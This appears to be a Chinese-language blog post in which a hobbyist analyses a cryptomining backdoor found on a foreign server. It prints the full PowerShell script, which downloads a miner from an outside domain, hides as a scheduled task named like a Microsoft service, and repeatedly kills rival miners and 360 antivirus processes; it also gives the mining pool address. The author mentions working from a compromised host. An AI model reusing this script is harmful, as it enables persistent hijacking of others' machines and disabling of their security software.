分享一个“国外”的挖矿后门(含附件)

前言

事情也很简单,最近坛子里好多兄弟都在问他们用的搬瓦工IP被封得不要不要的该怎么办,我虽然有Google cloud免费的服务器,但是那个服务器除了配置是收费的,还有就是流量也收费,坑爹是对中国大陆的流量要相较其他地方的流量要贵那么点点,也就是说如果我用那些流量来看小电影的话流量是吃不住的。

所以作为一个修电脑的网络安全成爱好者,我们就只有通过自己的手段来做梯子,简单就是找找境外的服务器来玩玩,虽然掉的可能性很大,但是在不断的找“梯子”的同时,我也学到了很多。比如这里捡到的别人的挖矿软件,直接占用系统的100% CPU性能,我他妈好好的梯子就这样搞得根本就上不了有土鳖了。

先放一下他的powershell

$ne = $MyInvocation.MyCommand.Path
$nurl = "http://dl.jjsfhjsdf87hsadfn.xyz/lan.exe"
$noutput = "$env:TMP\lan.exe"
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($nurl,$noutput)
copy $ne $HOME\tasks.ps1
copy $env:TMP\lan.exe $env:TMP\lan.exe

SchTasks.exe /Create /SC MINUTE /TN "Services for Microsoft Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\tasks.ps1" /MO 6 /F
SchTasks.exe /Delete /TN "Update service for Oracle products" /F
SchTasks.exe /Delete /TN "Update service for Oracle productsa" /F
SchTasks.exe /Delete /TN "Update service for Oracle productsaa" /F
SchTasks.exe /Delete /TN "Update service for Oracle productsaaa" /F
SchTasks.exe /Delete /TN "Update service for Oracle products5" /F
SchTasks.exe /Delete /TN "Update service for Oracle products1" /F
SchTasks.exe /Delete /TN "Update service for Oracle products2" /F
SchTasks.exe /Delete /TN "Update service for Oracle products3" /F
SchTasks.exe /Delete /TN "Update service for Oracle products4" /F
SchTasks.exe /Delete /TN "Update service for Oracle products7" /F
SchTasks.exe /Delete /TN "Update service for Oracle products8" /F
SchTasks.exe /Delete /TN "Update service for Oracle products0" /F

while ($true) {
        if(!(Get-Process isa -ErrorAction SilentlyContinue)) {
                echo Not
cmd.exe /C taskkill /IM ddg.exe /f
cmd.exe /C taskkill /IM isa.exe /f
cmd.exe /C taskkill /IM yam.exe /f
cmd.exe /C taskkill /IM miner.exe /f
cmd.exe /C taskkill /IM xmrig.exe /f
cmd.exe /C taskkill /IM nscpucnminer32.exe /f
cmd.exe /C taskkill /IM 1e.exe /f
cmd.exe /C taskkill /IM iie.exe /f
cmd.exe /C taskkill /IM 3.exe /f
cmd.exe /C taskkill /IM xe.exe /f
cmd.exe /C taskkill /IM xxe.exe /f
cmd.exe /C taskkill /IM iee.exe /f
cmd.exe /C taskkill /IM ie.exe /f
cmd.exe /C taskkill /IM je.exe /f
cmd.exe /C taskkill /IM ie.exe /f
cmd.exe /C taskkill /IM im360sd.exe /f
cmd.exe /C taskkill /IM iexplorer.exe /f
cmd.exe /C taskkill /IM imzhudongfangyu.exe /f
cmd.exe /C taskkill /IM 360tray.exe /f
cmd.exe /C taskkill /IM 360rp.exe /f
cmd.exe /C taskkill /IM 360rps.exe /f

                cmd.exe /C $env:TMP\lan.exe
        } else {
                echo RUn
        }
           Start-Sleep 55
}

代码这里因为主题的原因,看不到复制的选择痕迹(你懂我意思吧!就是你选择了是看不到的,你可以直接点上门的那个复制按钮就复制了)

看到这里的几个360的主进程,让我不禁怀疑国人制作的,因为国外的杀毒很少会有360的,起码我暂时还没遇到,反而是MSE这些比较多。

通过访问他的站看着还是挺唬人的

相关的whois

可以看到这个域名是今年二月份刚注册的,这个月9号刚刚更新了一下也不知道着两个月他的手了多少。

 

卧槽,动不动就FBI,我只知道FBI warning

 

1,对powershell虽然不是很懂,但是简单的可以看到这是一个黑吃黑的脚本,下载他本地的挖矿软件lan.exe

2,他除了关闭大数字的杀毒和主动防御就是结束其他可能是挖矿的进程。

3,通过列进程目录来结束对应的进程名,并且很55秒循环一次,循环的去关掉那些进程。

 

因为是在肉鸡上面分析的,所以没有专业的软件,可以看到他在这里连接了自己的矿池
host:54.39.77.214:3333
同时还有一个进程名称伪装成系统进程的守护程序

结果下载了这个挖矿后门看了一下,才知道为什么他要结束360了,但是后背一凉的让我感觉,他既然结束360除了是360的云查杀可以杀了他之外,或许是不是针对国内的很多服务器疯狂利用漏洞种马的原因就不得而知了。

这种东西如果服务器上有杀软的话肯定没这种容易就得逞,或者你的权限配置有问题,还有powershell是个好东西。这个作者自己做后门,自己做矿池来搞的我是第一次见,之前搞的国外服务器里面就有遇到一些普通的挖矿程序,这个让我眼前一亮。

国内的服务器很久不搞了,那都是高中的时候不懂事瞎搞的,如果真要搞,国内那些不能碰的机构网站、学校网站肯定很多要吃亏。

还有这里说一句,那些“小学生”、“娱乐圈”的大神们,别动不动就作死去搞gov啊edu这些,真的很傻逼。

 

aimorc

我还没有学会写个人说明!

Leave a Reply

Your email address will not be published. Required fields are marked *

微信扫一扫,分享到朋友圈

分享一个“国外”的挖矿后门(含附件)
返回顶部

显示

忘记密码?

显示

显示

获取验证码

Close